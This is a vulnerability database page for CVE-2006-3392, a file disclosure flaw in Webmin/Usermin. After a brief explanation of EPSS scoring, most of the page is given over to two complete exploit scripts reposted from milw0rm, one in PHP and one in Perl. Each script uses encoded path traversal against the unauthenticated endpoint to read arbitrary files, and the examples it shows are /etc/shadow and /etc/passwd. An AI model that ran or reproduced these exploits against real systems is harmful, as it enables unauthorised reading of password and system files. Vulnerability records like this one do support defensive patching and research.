CVE-2006-3392 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

<?php /* Name : Webmin / Usermin Arbitrary File Disclosure Vulnerability Date : 2006-06-30 Patch : update to version 1.290 Advisory : http://securitydot.net/vuln/exploits/vulnerabilities/articles/17885/vuln.html Coded by joffer , http://securitydot.net */ $host = $argv[1]; $port = $argv[2]; $http = $argv[3]; $file = $argv[4]; // CHECKING THE INPUT if($host != "" && $port != "" && $http != "" && $file != "") { $z = "/..%01"; for ($i=0;$i<60;$i++) { $z.="/..%01"; } $target = $http."://".$host.":".$port."/unauthenticated".$z."/".$file.""; echo "Attacking ".$host."\n"; echo "---------------------------------\n"; // INITIALIZING CURL SESSION TO THE TARGET $ch = curl_init(); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $target); curl_setopt ($ch, CURLOPT_TIMEOUT, '10'); curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE); $content = curl_exec($ch); curl_close ($ch); // CLOSING CURL // ECHOING THE CONTENT OF THE $FILE echo $content; echo "---------------------------------\n"; echo "Coded by joffer , http://securitydot.net\n"; } else { // IF INPUT IS NOT CORRECT DISPLAY THE README echo "Usage php webmin.php HOST PORT HTTP/HTTPS FILE\n"; echo "Example : php webmin.php localhost 10000 http /etc/shadow\n"; echo "Coded by joffer , http://securitydot.net\n"; } ?> # milw0rm.com [2006-07-09]

#!/usr/bin/perl # Exploit for WEBMIN and USERMIN less than 1.29x # ARBITARY REMOTE FILE DISCLOSURE # WORKS FOR HTTP AND HTTPS (NOW) # Thrusday 13th July 2006 # Vulnerability Disclosure at securitydot.net # Coded by UmZ! umz32.dll _at_ gmail.com # # # # Make sure you have LWP before using this exploit. # USE IT AT YOUR OWN RISK # # GREETS to wiseguy, Anonymous Individual, Uquali......Jhant... Fakhru... etc........................ # for other.. like AHMED n FAIZ ... (GET A LIFE MAN). # Revised on Friday 14th July 2006 use LWP::Simple; use LWP::UserAgent; my $userag = LWP::UserAgent->new; if (@ARGV < 4) { print("Usage: $0 <url> <port> <filename> <target> \n"); print("TARGETS are\n "); print("0 - > HTTP \n"); print(" 1 - > HTTPS\n"); print("Define full path with file name \n"); print("Example: ./webmin.pl blah.com 10000 /etc/passwd\n"); exit(1); } ($target, $port,$filename, $tar) = @ARGV; print("WEBMIN EXPLOIT !!!!! coded by UmZ!\n"); print("Comments and Suggestions are welcome at umz32.dll [at] gmail.com\n"); print("Vulnerability disclose at securitydot.net\nI am just coding it in perl 'cuz I hate PHP!\n"); print("Attacking $target on port $port!\n"); print("FILENAME: $filename\n"); $temp="/..%01" x 40; if ($tar == '0') { my $url= "http://". $target. ":" . $port ."/unauthenticated/".$temp . $filename; $content=get $url; print("\n FILE CONTENT STARTED"); print("\n -----------------------------------\n"); print("$content"); print("\n -------------------------------------\n"); } elsif ($tar == '1') { my $url= "https://". $target. ":" . $port ."/unauthenticated/".$temp . $filename; my $req = HTTP::Request->new(GET => $url); my $res = $userag->request($req); if ($res->is_success) { print("FILE CONTENT STARTED\n"); print("-------------------------------------------\n"); print $res->as_string; print("-------------------------------------------\n"); } else { print "Failed: ", $res->status_line, "\n"; } } # milw0rm.com [2006-07-15]